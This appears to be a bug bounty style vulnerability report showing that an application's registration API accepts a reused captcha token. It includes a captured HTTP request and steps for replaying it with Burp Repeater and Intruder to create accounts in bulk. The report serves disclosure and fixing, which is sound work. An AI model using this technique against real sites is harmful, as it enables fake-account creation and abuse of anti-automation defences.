Description

An attacker can create bypass the captcha mechanism and create multiple accounts directly

Proof of Concept

1: Sign up with a new name in the application, fill the captcha and intercept the request of the submit.

The request will look something like this

POST /answer/api/v1/user/register/email HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 
Content-Type: application/json
Content-Length: 123
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/users/register

{"name":"hello","e_mail":"ldjifp@yopmail.com","pass":"Test12345@","captcha_code":"icwb","captcha_id":"OjzH8Dxh9udAm36faCQz"}

2: Forward the same request over the repeater and simply change the email id to a new email. Although the previous captcha token is present, it will still be accepted and will create a new user directly.

You can try performing the same over burp intruder to automate the entire part by adding an insertion point in any section of the email id with corresponding payloads and start the attack, all responses will arrive with the status of 200 OK whichever contains a new email

 

Impact

Circumventing anti-automation mechanisms deployed by the captcha and perform automation.